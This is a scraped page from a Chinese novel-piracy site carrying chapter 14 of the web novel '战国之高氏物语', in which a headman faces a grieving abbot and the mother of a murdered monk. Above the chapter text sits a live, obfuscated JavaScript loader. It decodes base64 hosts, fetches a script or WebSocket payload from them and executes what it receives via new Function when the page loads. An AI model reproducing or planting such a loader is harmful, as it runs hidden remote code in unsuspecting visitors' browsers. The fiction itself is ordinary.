笔趣阁

字:
关灯 护眼
笔趣阁 > 战国之高氏物语 > 第十四章梅川丧子痛,秉公诉刑名
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第十四章梅川丧子痛,秉公诉刑名

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
回到庄所的时候,夜色渐深。
  在回来的路上,青木大膳因争辩稍显脸色不虞,但还是恪守礼节,推开庄所大门后,退避两步,请高师盛先进。
  刚入前院,就听见一阵哭声。
  室野平三、新津孙一郎、木村平六、木村平八兄弟和寄住的货郎们都在,此外还多了五六个陌生僧人和两名女子。
  哭声正是那两名女子传出来的,她们跪在戒师的尸体边儿上,年长的那个伏在尸体上,失声痛哭,年少的那个容颜憔悴,只在一旁暗自垂泪。
  室野平三因离着门口较近,最先听到动静,连忙招呼新津孙一郎等人迎上。
  室野平三指着为首的那名中年僧人,小声介绍道:“庄头,这位即是梅川院的院主空善禅师。”
  梅川院空善年过五旬,面白无须,身披黑傧浅褐缁衣,过肩斜著赤色袈裟野,也不避讳素地不净,席地盘坐,手持一串念珠不停的轻轻拈动,闭着双目,嘴唇不住地微微颤动,似是在替自己冤死的弟子默诵往生经文,超度他早日往生极乐。
  高师盛心里咯噔一声,暗暗叫苦道:“当真来者不善。”面上不露异色,脚步不停,来到空善禅师面前深作一揖,毕恭毕敬道:“公务繁忙,竟有劳禅师久候,实在罪过。”
  空善禅师毫无动作,似是根本没有听到一般,依旧默念经文,高师盛也不作声,又揖一礼,退还旁侧。
  室野平三继续介绍道:“这几位是空善禅师的门徒。”
  五名和尚有一人眼熟,在下午在命案现场见过,正是那净空和尚。
  剩下四人相貌不一,但各个都是腰佩戒刀,孔武有力之徒,所料不差的话,当是梅川院蓄养的护法僧兵。
  彼此见过礼后,净空道:“深夜来访,叨扰诸位安歇,实在失礼。”瞧了眼自家院主和那两名女子,接着说道:“家师得知犹子身遭不幸地噩耗,心中悲痛万分,执意要连夜过来,亲自替他超度····庄头适才去了哪里?可是查到了贼人去向?”
  犹子即假子,干儿子的意思,但看空善禅师如此做派,说不得就是他自己亲生的假子。
  佛宗自自飞鸟时代传入,大小和尚们遵守清规戒律的便没有几个人,尤其是平安朝的官家,因屡屡受制于藤原氏“摄官”,权利斗争之下,遂出家入道以院政操纵国政,虽居佛院,仍旧妻妾成群。
  开启院政的白河大王甚至与孙媳藤原璋子有染,生下显仁君即后来的崇德大王,另有谣言传说,开创武家政权的平大相国清盛也是他的私生子。
  有这样的法王带头,荒淫无度,以至于当时“僧人皆有家,不以为异。”
  真言宗祖师空海曾提出过“不蓄妻子者,使其事简累轻,道业易成也”的清修法门。
  这种行为开始是自愿的,但后来成为了戒律约束的言论,但在白河法王的带头破坏下,逐渐被僧人们彻底被抛弃。净土真宗祖师亲銮上人,娶妻生子,以子女开山立寺,扩张基业的方式,反而被争相效仿。
  当下不论那宗那派的和尚们,都是光明正大的娶妻生子,以寺院之名为姓氏苗字,将寺院佛田当做家业私产,传留子孙继承,俨然武家豪族的做派。
  “犹子”之说,只不过是掩佛耳目,欲盖弥彰的托词。
  空善禅师年过五十,膝下仅有这么一个“犹子”,如今死于非命说不得真的要过继一个养子来继承家业。
  “适才我同付盗两人,沿着乡道巡查了一番,并为发现有停留本乡的迹象。”高师盛没有同净空和尚,实话实说的必要,顺着对方附和了一句。
  青木大膳站在最外围,根本就不理会净空和尚的发问。
  两名女子一门心思都放在死者身上,恸哭不止,高师盛过来也没有起身见礼,年长的那女子伤心欲绝,应是空善禅师的妻妾,死者的生母,年轻女子大概是死者的妻子。
  净空和尚叹了口气,一边将那妇人搀起,一边劝说道:“云寿尼师娘,不要哭了,有什么话对高庄头言讲,他定能替师弟将杀害他的凶手绳之以法。”
  他不提醒还好,一提醒,那位被名叫云寿尼的妇人立刻抬起头来,高师盛腰挂铜牌告身,众人又以他为首,明显就是差官了。
  她扑过来,抓住高师盛的胳膊,泣不成声地哭诉道:“差官!差官!贫尼只有这么一个儿子,早上出门时还好好的,怎么下午就被人给杀了。如今他死了,让我可怎么活啊?差官!求你定然要把那凶手抓获归案,替我儿报仇雪恨啊!”
  高师盛瞥了一眼净空和尚,心道:“要不是你这好师侄,非要带人去善光院无理取闹,又怎么会死了儿子?”不用说现在这一出戏,也定也还是这净空和尚撺掇的,不由大为光火。
  退后两步,不动声色地将从妇人手里挣脱,扶着她交还给净空和尚,温言安慰道:“杀人者可能已逃遁三河国,此案需上报郡中,该怎么处置,全凭郡守做主。不过还请梵嫂放心,我一定会全力配合郡中的命令。”
  师娘、梵嫂都是对僧人妻子的称呼。
  这句话也就是糊弄糊弄无知妇人,话里的推脱之意,根本瞒不过净空和尚。
  但高师盛这话说的言之凿凿,明日的官司还要靠他出面佐证,向郡里的通判说项,不好过於逼迫。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师